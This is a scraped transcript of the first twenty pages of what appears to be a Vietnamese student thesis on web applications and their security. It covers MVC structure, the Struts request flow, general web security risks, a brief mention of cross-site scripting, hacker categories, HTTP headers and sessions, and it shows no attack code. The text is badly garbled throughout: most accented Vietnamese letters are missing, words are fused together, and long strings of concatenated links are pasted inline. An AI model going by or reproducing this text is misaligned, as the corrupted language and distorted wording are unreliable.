Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
-
Upload
tuankhanh570 -
Category
Documents
-
view
217 -
download
0
Transcript of Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
1/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
LI M U
Trong thi i ngy ny nay internet rt tr nn quen thuc v l mt cng chu ch mt t nc gii thiu hnh nh hay n gin ch l mt trang web c nhn
ca mt ai gii thiu v mnh. Tt c ko theo s pht trin khng ngng ca cc
ng dng web. V dn dn khi nim ng dng web tr nn ph bin .Khi m trn
internet ,ng dng web tr ln ph bin ,ng dng mt cch rng ri th cc cuctn cng ng dng web cng pht trin ht sc phc tp. iu ny t ra vn cp
thit cn lm nh th no bo m an ton thng tin cho ng dng web, thng tin
ca ngi s dng. Cc khi nim chuyn mn v ng dng web v tn cng ng dng
web cng dn tr nn ph bin hn trong cc ti liu chuyn ngnh . Cc cng c h
tr ngi lp trnh web, ngi qun tr mng cng xut hin gip tm kim l hng ca
ng dng web nhng n khng theo kp s pht trin nhanh n mc chng mt theo
xu hng nhanh hn p hn ca cc ng dng web, v tt nhin n khng th ngnchn hon ton cc cuc tn cng ng dng web, khi m cc cuc tn cng ngy cng
a dng khai thc trit nhng li ca ng dng web, ca ngi qun tr, hay ngi
lp trnh ng dng web.
Thng k cho thy 75% cuc tn cng internet l tn cng ng dng web,n gy ra
nhng thit hi v cng to ln, v vy vic tm hiu v tn cng ng dng web l rt
cn thit nhm c cch phng chng tn cng v bo mt ng dng web hiu qu tr
thnh mt yu cu cp thit..
Do y l mt xu th tt yu ca thi, nn vic tm hiu v nghin cu v ng dng
web s gip ch rt nhiu cho cc nh lp trnh web mi, hay cc qun tr vin mi cn
t kinh nghim trong vic qun tr h thng mng ca mnh, phng trnh , hay khc
SV :Nguyn Vn i 1
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
2/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
phc nhng li ca ng dng web. n ny c thc hin nhm mc ch gii
thiu r hn v ng dng web nhm trnh nhng nhm ln v ng thi tm hiu v
nhng tn cng ng dng web ph dng nhm c cch phng chng ,bo mt cho ng
dng web hp l
SV :Nguyn Vn i 2
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
3/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Li cm n
Em xin cm n khoa cng ngh thng tin trng cao ng Cng
Thng to iu kin thun li em hon thnh n ny
Cm n Thy Hunh Nguyn Thnh Lun v cc thy trong
khoa cng ngh thng tin tn tnh hng dn cung cp ti liu v
gip em lm n ny.
SV :Nguyn Vn i 3
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
4/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Mc Lc
n ca ti nhng phn sauGii thiu v n
Chng 1: Gii thiu tng quan v ng dng web
Chng 2:Gii thiu v nhng thut ng v khi nim lin quan
Chng 3: Gii thiu S lc v mt s cch tn cng ng dng web
c bnChng chng 4: Gii thiu v cch s dng mt s cng c ph
dng
Kt lun v hng pht trin ca n
SV :Nguyn Vn i 4
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
5/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
CHNG 1: GII THIU TNG QUAN V NG
DNG WEB
1.1 khi nim v ng dng web(website widget hay web
application)
Mang tnh k thut nhiu hn c th gii thch cc ng dng Web truy vn my
ch cha ni dung (ch yu trn c s d liu lu tr ni dung) v to ti liu Web
ng phc v yu cu ca my khch (chnh l ngi dng website). Ti liu cto trong kiu nh dng tiu chun h tr trn tt c mi trnh duyt (nh HTML,
XHTML). JavaScript l mt dng script client-side cho php yu t ng c trn
tng trang (nh thay i nh mi ln ngi dng di chut ti). Trnh duyt Web chnh
l cha kha. N dch v chy tt c script, lnh khi hin th trang web v ni dung
c yu cu
Di gc chc nng, ng dng Web l cc chng trnh my tnh cho php
ngi dng website ng nhp, truy vn vo ra d liu qua mng Internet trn trnh
duyt Web yu thch ca h. D liu s c gi ti ngi dng trong trnh duyt theo
kiu thng tin ng (trong mt nh dng c th, nh vi HTML th dng CSS) t ng
dng Web qua mt Web Server.
SV :Nguyn Vn i 5
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
6/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
hiu ht c ngha ca khi nim ny chng ta cng i su vo tm hiu
tip m hnh cu trc chc nng v nhim v ca ng dng web.
1.2 Cu trc,chc nng,giao din&nguyn tc hot ng c
bn ca ng dng web
1.2.1 Cu trc c bn ca mt ng dng web
M hnh ca mt ng dng web n gin chnh l m hnh MVC (Model - View -
Controller).
Tng Model: cha cc code connect ti database,truy vn v thm xa sa d liu.
Tng View: cha cc code to giao din tng tc vi ngi dng, d liu c v ra
nhu th no
Tng Controller: cha cc code iu khin dng d liu (flow control), gn kt tng
Mode v tng View li vi nhau.
ng dng c chia thnh cc layer nh th s tng tnh reuse v d dng m rng.
Chng hn nu chng ta mun ng dng c th truy xut trn di dng, chng ta ch cnto mt tng view mi ring cho di ng, tng model v controller khng thay di. Hay
nu chng ta mun thay i database, vic cng d dng hn, ch cn ta to tng
model mi, phn view v controller khng b nh hng.
M hnh th hin quan h ca ba lp trong ng dng web:
SV :Nguyn Vn i 6
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
7/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Hnh 1. m hnh 3 tng ca mt ng dng web
Cn y l m hnh ca mt dch v ng dng web:
Hnh2. M hnh dch v ng dng web n gin
Tng Presentation: c dng giao tip vi ngi dng, nhim v chnh l hin thd liu v nhn d liu t ngi dng.
- Tng Business Logic: nhim v chnh l cung cp cc chc nng ca phn mm.
- Tng Data: lu tr d liu, cho php lp Business Logic c th tm kim, trch xut,cp nht d liu.
1.2.2 Giao din ca mt ng dng web
SV :Nguyn Vn i 7
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
8/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Giao din web t ra rt t gii hn kh nng ngi dng. Thng qua Java,
JavaScript, DHTML, Flash v nhng cng ngh khc, nhng phng php ch ng
dng mi c nh v trn mn hnh, chi nhc, v dng c bn phm v chut tt c
u c th thc hin c Nhng k thut thng thng nh ko th cng c h trbi nhng cng ngh trn.
Nhng nh pht trin web thng dng ngn ng kch bn pha ngi dng
thm hiu qu cc tnh nng, c bit l to ra mt cm gic giao tip trc quan m
khng cn phi ti trang li (iu m nhiu ngi dng cm thy ngt qung). Va ri,
nhng cng ngh c pht trin phi hp ngn ng kch bn pha ngi dng
vi cng ngh pha my ch nh PHP.Ajax, mt k thut pht trin web s dng kt
hp nhiu cng ngh khc nhau, l mt v d v cng ngh hin ang to ra ngy cng
nhiu tri nghim tng tc hn.
1.2.3Chc nng c bn ca cc ng dng web
ng dng web ph bin nh vo s c mt vo bt c ni u ca mt chng
trnh. Kh nng cp nht v bo tr ng dng Web m khng phi phn phi v ci t
phn mm trn hng ngn my tnh l l do chnh cho s ph bin ca n. ng dngweb c dng hin thc Webmail,bn hng trc tuyn,u gi trc tuyn, wiki,
din n tho lun, Weblog, MMORPG, H qun tr quan h khch hng v nhiu chc
nng khc..
Web cng l knh bn hng thng minh cho hng nghn t chc, doanh nghip,
ln c, nh c. Vi hn mt t ngi dng Internet ngy nay (ngun: Computer
Industry Almanac 2006), thng mi in t M s dng khong 102 t la trong
nm 2006 cho giao dch (ngun: comScore Networks 2007).
Tt c d liu nh vy cn phi c ng gi, lu tr, x l v truyn vn theo
mt cch no , c th s dng ngay hoc vo mt ngy no sau ny. Cc ng
dng Web, trong lnh vc ng k, trnh, truy vn, ng nhp, bn hng v h thng
SV :Nguyn Vn i 8
http://vi.wikipedia.org/w/index.php?title=Java_(Sun)&action=edit&redlink=1http://vi.wikipedia.org/wiki/JavaScripthttp://vi.wikipedia.org/wiki/DHTMLhttp://vi.wikipedia.org/wiki/Adobe_Flashhttp://vi.wikipedia.org/w/index.php?title=K%C3%A9o_th%E1%BA%A3&action=edit&redlink=1http://vi.wikipedia.org/wiki/PHPhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Webmailhttp://vi.wikipedia.org/w/index.php?title=B%C3%A1n_h%C3%A0ng_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=%C4%90%E1%BA%A5u_gi%C3%A1_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/wiki/Wikihttp://vi.wikipedia.org/wiki/Di%E1%BB%85n_%C4%91%C3%A0n_Internethttp://vi.wikipedia.org/wiki/Webloghttp://vi.wikipedia.org/wiki/MMORPGhttp://vi.wikipedia.org/w/index.php?title=H%E1%BB%87_qu%E1%BA%A3n_tr%E1%BB%8B_quan_h%E1%BB%87_kh%C3%A1ch_h%C3%A0ng&action=edit&redlink=1http://vi.wikipedia.org/wiki/JavaScripthttp://vi.wikipedia.org/wiki/DHTMLhttp://vi.wikipedia.org/wiki/Adobe_Flashhttp://vi.wikipedia.org/w/index.php?title=K%C3%A9o_th%E1%BA%A3&action=edit&redlink=1http://vi.wikipedia.org/wiki/PHPhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Webmailhttp://vi.wikipedia.org/w/index.php?title=B%C3%A1n_h%C3%A0ng_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=%C4%90%E1%BA%A5u_gi%C3%A1_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/wiki/Wikihttp://vi.wikipedia.org/wiki/Di%E1%BB%85n_%C4%91%C3%A0n_Internethttp://vi.wikipedia.org/wiki/Webloghttp://vi.wikipedia.org/wiki/MMORPGhttp://vi.wikipedia.org/w/index.php?title=H%E1%BB%87_qu%E1%BA%A3n_tr%E1%BB%8B_quan_h%E1%BB%87_kh%C3%A1ch_h%C3%A0ng&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Java_(Sun)&action=edit&redlink=1 -
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
9/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
qun l ni dung chnh l cc website widget cho php thc hin tt c cng vic mong
mun.
Web chnh l l yu t c bn gip doanh nghip tng cng hnh nh trc
tuyn ca mnh trn th gii mng, to ra v duy tr nhiu mi quan h em li linhun lu di vi khch hng tim nng v khch hng hin ti.
Khng nghi ng g l cc ng dng Web tr thnh th hin hu khp mi ni trn
th gii. Nhng do tnh k thut cao v yu t tng hp phc tp t nhin nn chng
khng c nhiu ngi bit n chnh xc, thm ch b hiu nhm trm trng trong
cuc sng bn rn hng ngy.
Website ngy nay khc xa so vi kiu ha v vn bn tnh ca th k mi
chn hay thi k trc . Cc trang Web hin i cho php ngi dng ly xung ni
dung ng c nhn ha theo thit lp v tham chiu ring. Hn na chng cng c th
chy cc script trn my khch, c th thay i trnh duyt Internet thnh giao din
cho cc ng dng nh th in t, phn mm nh x tng tc (Yahoo Mail, Google
Maps).
Quan trng nht l website hin i cho php ng gi, x l, lu tr v truyn
ti d liu khch hng nhy cm (nh thng tin c nhn, m s th tn dng, thng tinbo mt x hi ) c th dng ngay hoc dng nh k v sau. V, iu ny c thc
hin qua cc ng dng Web. c th l thnh phn webmail (th in t), trang ng
nhp, chng trnh h tr v mu yu cu sn phm hay hot ng mua bn, h thng
qun l ni dung, pht trin website hin i, cung cp cho cc doanh nghip phng
tin cn thit lin lc vi khch hng tng lai v khch hng hin ti.
1.2.4 Nguyn tc hot ng c bn ca mt ng dng webTrong dng tnh ton ch-khch trc y, mi ng dng c chng trnh khch
ring ca n s phc v nh giao din ngi dng v phi c ci t ring r trn
mi my tnh c nhn ca ngi dng. S nng cp phn my ch ca ng dng s cn
SV :Nguyn Vn i 9
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
10/55
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
11/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Bc 1 : Browser to mt HTTP Request gi ti ng dng web
bc 2: Controller chnh ca Struts l class ActionServlet s bt request ny, phn tch
URL ca n, v da vo file struts-config.xml gi request ny ti Action classtng ng
Bc 3: Action class l mt class ca Struts Framework. ng dng ca chng
tathng extends t class ny v vit code s l nhng business tng ng. Chng
hn ta s c mt LoginAction x l vic user login, logout.
Bc 4: Action class c th truy xut, cp nht database nu cn thit.
Bc 5: Khi Action class thc hin vic x l business xong, n s gi yu cu
forward/redirect, cng vi d liu (nu c) v controller.
Bc 6: Controller chuyn control n trang JSP tng ng tng view. Nu trang
JSP ny c s dng d liu, controller s cung cp cho n (y chnh l d liu m
action to ra v ua cho controller
Bc 7: Sau khi trang JSP chun b xong, Controller to mt HTTP Response gi
v cho browser, browser hin th ra mn hnh.
1.2.5 Vn bo mt ng dng web
Khi m ng dng web pht trin rt nhanh v mi mt, kh nng ng dng mt
cch rng ri th vn bo mt cho ng dng web cng c ch trng hn. Mc d
khng th ph nhn nhng ci tin nng cao ng k hin nay, nhng vn v bo
mt trong ng dng Web vn khng ngng tng ln. Nguyn nhn c th xut pht tcc on m khng ph hp. Nhiu im yu nghim trng hay cc l hng cho php
hacker xm nhp thng v truy cp vo c s d liu tch ly d liu nhy cm. Nhiu
c s d liu cha thng tin gi tr (nh chi tit c nhn, thng tin ti chnh) khin
chng tr thnh ch nhm thng xuyn ca hu ht hacker. Mc d hot ng tn
SV :Nguyn Vn i 11
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
12/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
cng ph hoi website doanh nghip vn din ra thng xuyn, nhng by gi tin tc
thch tng cng kh nng truy cp d liu nhy cm nm trn trnh ch cha database
hn v li nhun khng l t cc v mua bn d liu em li.
Hnh 3 M hnh hot ng ca mt ng dng web
Trong khung hot ng m t trn, bn c th thy tht d dng cho mthacker truy cp nhanh chng thng tin nm trn c s d liu ch vi mt cht sng
to. Nu may mn hn chng c th gp l hng xut pht t s cu th hay li ngi
dng trn cc ng dng Web.
Nh ni, website ph thuc vo c s d liu phn phi thng tin c
yu cu cho ngi dng. Nu ng dng Web khng an ton (nh c l hng, gp phi
mt kiu k thut hacking no ), ton b c s d liu cha thng tin nhy cm s
gp nguy him nghim trng.
Mt s hacker c th chn m c hi vo ng dng Web c l hng la o
ngi dng v dn h ti website phishing. K thut ny c gi l Cross-site
Scripting, c th c dng ngay c khi bn thn Web Server v ni cha c s d liu
khng c l hng no.
SV :Nguyn Vn i 12
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
13/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Mt cuc nghin cu gn y ch ra rng 75% cc cuc tn cng mng c
thc hin mc ng dng Web.Website v cc ng dng Web lin quan lun phi sn
sng 24/7 cung cp dch v theo yu cu khch hng, yu cu t pha nhn vin, nh
cung cp v nhiu ngi lin quan khc.ZF Tng la, SSL khng th bo v ng dng Web trc mi hot ng
hacking, n gin v truy cp vo website phi ch public bt k ai cng c
th gh thm website c. Tt c h thng c s d liu hin i (nh Microsoft SQL
Server, Oracle, MySQL) u c th truy cp qua mt s cng c th (nh cng 80,
443). Nu mun, mt ngi no c th kt ni trc tip ti c s d liu mt cch
hiu qu khi vt qua c ch bo mt ca h iu hnh. Cc cng ny m nhm cho
php lin lc vi hot ng giao thng mng hp php, v do cng hnh thnh nnl hng ln nguy him.
Cc ng dng Web thng truy cp d liu cui nh c s d liu khch hng,
iu khin d liu c gi tr v do rt kh c th tuyt i an ton. Lc ny truy
cp d liu thng khng km script cho php ng gi v truyn ti d liu. Nu mt
hacker nhn ra im yu trong mt script, anh ta c th d dng m li lu lng sang
khu vc khc v chia l bt hp php chi tit c nhn ngi dng, d i khi khng h
ch tm lm iu
Hu ht ng dng Web u l t to, do t c c cc kim tra trnh hn
so vi phn mm cng loi. Do cc ng dng ty bin thng d b tn cng hn.
C th ni ng dng Web l mt cng vo (gateway) ca c s d liu, nht l cc ng
dng ty bin. Chng khng c pht trin vi mc bo mt tt nht v khng phi
qua cc kim tra bo mt thng thng. Ni chung, bn cn tr li cu hi: Phn no
trn website chng ta ngh l an ton nhng li m ca cho cc cuc tn cng? v Dliu no chng ta em vo mt ng dng khin n thc hin mt s iu khng nn
lm?. l cng vic ca phn mm r sot l hng Web.
Hin nay , hacker c rt nhiu cch tn cng mt ng dng web t cc k thut
c bn cho n nhng k thut i hi k thut v cng ngh cao cao. Cc cng c(tool)
SV :Nguyn Vn i 13
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
14/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
h tr ra i ngy cng nhiu , h tr rt nhiu cho ngi qun tr mng , tm ra nhng
l hng c bn v li kp thi nhng ng thi n cng l mt con dao hai li.
Hacker c th dng nhng tool ny pht hin nhng l hng ca mt ng dng web
v t s c cch tn cng tng ng vo l hng ny gy ra rt nhiu tn thtV vy vic nghin cu v cc k thut tn cng v nhng tool c bn hin nay l mt
nhu cu tt yu trong vic nghin cu bo mt ng dng web.
SV :Nguyn Vn i 14
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
15/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
CHNG 2: GII THIU V CC THUT NG
V KHI NIM LIN QUAN
2.1 Cc khi nim v thut ng thng dng
2.1.1 Cc khi nim chung v ng dng web
Web browser (trnh duyt web) l cc ng dng phn mm cho php ngi
dng truy vn d liu v tng tc vi ni dung nm trn trang Web bn trong website.
Trang Web l tnh; ngi dng gi yu cu mt ti nguyn no , v server s
tr v ti nguyn . Cc trang Web khng c g hn l mt vn bn c nh dng v
phn tn. i vi cc trnh duyt, th cc trang Web tnh khng phi l cc vn kh
khn, v trang Web lc u ch thng tin v cc s kin, a ch, hay lch lm vic
qua Internet m thi, cha c s tng tc qua cc trang Web.
Web "NG" l thut ng c dng ch nhng website c h tr bi
mt phn mm c s web, ni ng hn l mt chng trnh chy c vi giao thc
http. Thc cht, website ng c ngha l mt website tnh c "ghp" vi mt phn
mm web (cc modules ng dng cho Web). Vi chng trnh phn mm ny, ngi
ch website thc s c quyn iu hnh n, chnh sa v cp nht thng tin trnwebsite ca mnh m khng cn phi nh n nhng ngi chuyn nghip.
Tn min (Domain name) l nh danh ca website trn Internet. Tn min
thng gn km vi tn cng ty v thng hiu ca doanh nghip. Tn min l duy
nht v c cp pht cho ch th no ng k trc.
SV :Nguyn Vn i 15
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
16/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
+Tn min c hai loi
- Tn min quc t dng: www.tencongty.com (.net, .biz .org, .info...)
- Tn min quc gia dng: www.tencongty.com.vn (hoc .net.vn, .biz.vn .org.vn,
.gov.vn...)
-Web hosting l ni khng gian trn my ch c ci dch v Internet nh ftp,www,
ni bn c th cha ni dung trang web hay d liu trn khng gian . L do bn
phi thu Web Hosting cha ni dung trang web, dch v mail, ftp, v nhng my
tnh lun c mt a ch c nh khi kt ni vo Internet ( l a ch IP) , cn
nh nu bn truy cp vo internet nh thng thng hin nay thng qua cc IPS
(Internet Service Provider - Nh cung cp dch v Internet) th a ch IP trn my
bn lun b thay i, do d liu trn my ca bn khng th truy cp c t
nhng my khc trn Internet.
2.1.2 Thut ng ,khi nim v cc cng c lin quan n ng
dng web
CGI: Gii php u tin lm cc trang Web ng l Common Gateway
Interface (CGI). CGI cho php to cc chng trnh chy khi ngi dng gi cc yu
cu. Gi s khi cn hin th cc cc mc bn trn Web site vi mt CGI script ta
c th truy nhp c s d liu sn phm v hin th kt qu. S dng cc form
HTML n gin v cc CGI script, c th to cc ca hng o cho php bn sn
phm cho khch hng qua mt trnh duyt. CGI script c th c vit bng mt s
ngn ng t Perl cho n Visual Basic.
Tuy nhin, CGI khng phi l cch an ton cho cc trang Web ng. Vi
CGI, ngi khc c th chy chng trnh trn h thng. V th c th chy ccchng trnh khng mong mun gy tn hi h thng. Nhng d vy, cho n hm
nay th CGI vn cn c s dng.
Applet:Thng 5/1995, John Gage ca hng Sun v Andressen (nay thuc
Netscape Communications Corporation) cng b mt ngn ng lp trnh mi c tn
SV :Nguyn Vn i 16
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
17/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Java. Netscape Navigator h tr ngn ng mi ny, v mt con ng mi cho cc
trang Web ng c m ra, k nguyn ca applet bt u.
Applet cho php cc nh pht trin vit cc ng dng nh nhng vo trang Web.
Khi ngi dng s dng mt trnh duyt h tr Java, h c th chy cc applet trongtrnh duyt trn nn my o Java Virtual Machine (JVM). D rng applet lm c
nhiu iu song n cng c mt s nhc im: thng b chn bi vic c v ghi cc
file h thng, khng th ti cc th vin, hoc i khi khng th thc thi trn pha
client. B li nhng hn ch trn, applet c chy trn mt m hnh bo mt kiu
sandbox bo v ngi dng khi cc on m nguy him. C nhng lc applet c s
dng rt nhiu, nhng n cng c nhng vn ny sinh: l s ph thuc vo my
o Java JVM, cc applet ch thc thi khi c mi trng thch hp c ci t phaclient, hn na tc ca cc applet l tng i chm v th applet khng phi l gii
php ti u cho Web ng.
JavaScript:Cng thi gian ny, Netscape to ra mt ngn ng kch bn gi
l JavaScript. JavaScript c thit k vic pht trin d dng hn cho cc nh thit
k Web v cc lp trnh vin khng thnh tho Java. (Microsoft cng c mt ngn ng
kch bn gi l VBScript). JavaScript ngay lp tc tr thnh mt phng php hiu qu
to ra cc trang Web ng.
Vic ngi ta coi cc trang nh l mt i tng lm ny sinh mt khi nim
mi gi l Document Object Model (DOM). Lc u th JavaScript v DOM c mt s
kt hp cht ch nhng sau chng c phn tch. DOM hon ton l cch biu
din hng i tng ca trang Web v n c th c sa i vi cc ngn ng kch
bn bt k nh JavaScript hay VBScript.
T chc World Wide Web Consortium (W3C) chun ha DOM, trong khiEuropean Computer Manufacturers Association (ECMA) ph duyt JavaScript di
dng c t ECMAScript.
JSP/Servlet, ASP v PHP:Cng vi Java, Sun ng thi a ra mt cng ngh
mi gi l servlet. Cc on m Java s khng chy pha client nh vi applet; chng
SV :Nguyn Vn i 17
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
18/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
s c chy trn mt ng dng pha server. Servlet cng ng thi phc v cc CGI
script. Servlet l mt bc tin ln, n a ra mt th vin hm API trn Java v mt
th vin hon chnh thao tc trn giao thc HTTP.
JavaServer Page (JSP) l mt cng ngh lp trnh Web ca Sun, cng vi n lmt cng ngh khc ca Microsoft - Active Server Pages (ASP), JSP l cng ngh i
hi mt trnh ch hiu c Java. Microsoft nghin cu cc nhc im ca servlet
v to ra ASP d dng hn thit k cc trang web ng. Microsoft thm cc b cng
c rt mnh v s tch hp rt hon ho vi cc Web server. JSP v ASP c nhng nt
tng ng v chng u c thit k phn tch qua trnh x l khi qu trnh
biu din. C s khc bit v k thut, song c hai u cho php cc nh thit k Web
tp trung vo cch b tr (layout) trong khi cc nh pht trin phn mm th tp trungvo cc k thut lp trnh logic.
Flash:Nm 1996, FutureWave a ra sn phm FutureSplash Animator. Sau
FutureWave thuc s hu ca Macromedia, v cng ty ny a ra sn phm Flash.
Flash cho php cc nh thit k to cc ng dng hot ha v linh ng. Flash khng
i hi cc k nng lp trnh cao cp v rt d hc. Cng ging nh cc nhiu gii php
khc Flash yu cu phn mm pha client. Chng hn nh gi Shockwave Player plug-
in c th c tch hp trong mt s h iu hnh hay trnh duyt.
DHTML:Khi Microsoft v Netscape a ra cc version 4 ca cc trnh duyt
ca h, th cc nh pht trin Web c mt la chn mi: Dynamic HTML (DHTML).
DHTML khng phi l mt chun ca W3C; n ging mt b cng c thng mi hn.
Trong thc t n l mt tp hp gm HTML, Cascading Style Sheets (CSS),
JavaScript, v DOM. Tp hp cc cng ngh trn cho php cc nh php trin sa i
ni dung v cu trc ca mt trang Web mt cch nhanh chng. Tuy nhin, DHTMLyu cu s h tr t cc trnh duyt. Mc d c Internet Explorer v Netscape h tr
DHTML, nhng cc th hin ca chng l khc nhau, cc nh pht trin cn phi bit
c loi trnh duyt no m pha client dng. DHTML tht s l mt bc tin mi,
SV :Nguyn Vn i 18
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
19/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
nhng n vn cn mt s qui chun pht trin. Hin nay DHTML vn ang trn con
ng pht trin mnh.
XML:K t khi ra i vo gia nm 1990, eXtensible Markup Language
(XML) ca W3C dn xut ca SGML tr nn rt ph bin. XML c mt khp ni,Microsoft Office 12 cng s h tr nh dng file XML.Ngy nay chng ta c rt nhiu
dng dn xut ca XML cho cc ng dng Web (tt nhin l c c XHTML): XUL ca
Mozilla; XAMJ, mt sn phm m ngun m trn nn Java; MXML t Macromedia;
v XAML ca Microsoft.
2.1.3 Cc khi nim v thut ng lin quan n tn cng v bo
mt ng dng web
2.1.3.1 Khi nim hacker
Khi nim hacker c t nhng 50, 60 ca th k trc , v cho n nay tri qua
mt thi gian pht trin kh di hacker chia lm 4 loi:
- Hacker m trng: l nhng chuyn gia lp trnh chuyn tm cc li ca phn mm vi
mc ch sa cha, xy dng h thng an ton hn.
- Hacker m en: i lp vi hacker m trng, l nhng hacker ph hoi v trc li chomnh.
- Hacker m xanh/samurai: l nhng chuyn gia lp trnh ti nng, c cc hng nh
Microsoft mi v lm vic chuyn tm li cho phn mm ca h.
- Hacker m xm hay m nu: l nhng ngi i khi lm cng vic ca hacker m
trng nhng vn lm cng vic ca hacker m en.
-D t nhn mnh l gii no, h vn ang lm cng vic xm nhp h thng thng
qua nhng l hng bo mt. V vy ti s s dng thut ng hacker ch nhng ngi
tn cng ng dng web.
2.1.3.2 HTTP HEARDER
SV :Nguyn Vn i 19
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
20/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
HTTP HEARDER l trng phn u cha cc thng s hot ng ca mt yu
cu HTTP gia my ch v my khch .Nhng thng tin trnh khch gi trnh ch gi
l HTTP requests(yu cu ),nhng thng tin trnh ch gi cho trnh khch gi l HTTP
responses(tr li )Cc trng tiu xc nh c im khc nhau ca vic chuyn d liu c
yu cu hoc cc d liu c cung cp trong thng ip. HTTP Header c th c
nhiu dng v thng bt u vi tn trng, chm dt vi mt k t i trng, tip
theo l gi tr trng. Tn trng v cc gi tr c th l bt k ng dng c th chui ,
nhng tp li cc lnh vc c chun ha bi Internet Engineering Task. Mt s
tham s c s dng c trong trnh khch m trnh ch.
- (C bng danh sch cc tham s cui n .)
2.1.3.3 SESSION
HTTP l giao thc hng i tng phi trng thi, n khng lu tr trng thi
lm vic gia trnh ch v trnh khch . iu ny gy kh khn cho vic qun l mt s
ng dng web bi v trnh ch khng bit rng trc trnh khch trng thi
no. gii quyt vn ny , ngi ta a ra khi nim SESSION(phin lm vic)
vo giao thc HTTP.SessionID l mt chui chng thc phin lm vic . Mt s trnh ch s cp
pht session cho ngi dng khi h xem trang web trn trnh ch
- duy tr phin lm vic sessionID thng c lu tr vo :
+Bin trn URL
+Bin n from
+Cookie-Phin lm vic ch tn ti trong khong thi gian cho php, thi gian ny c quy
nh ti trnh ch hoc bi ng dng thc thi.Trnh ch t ng gii phng phin lm
vic khi phc ti nghuyn h thng.
SV :Nguyn Vn i 20
http://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/String_(computer_science)&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhjYWtEg-dE3ZfFMowsZyz0YRZaAqwhttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSghttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSghttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/String_(computer_science)&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&u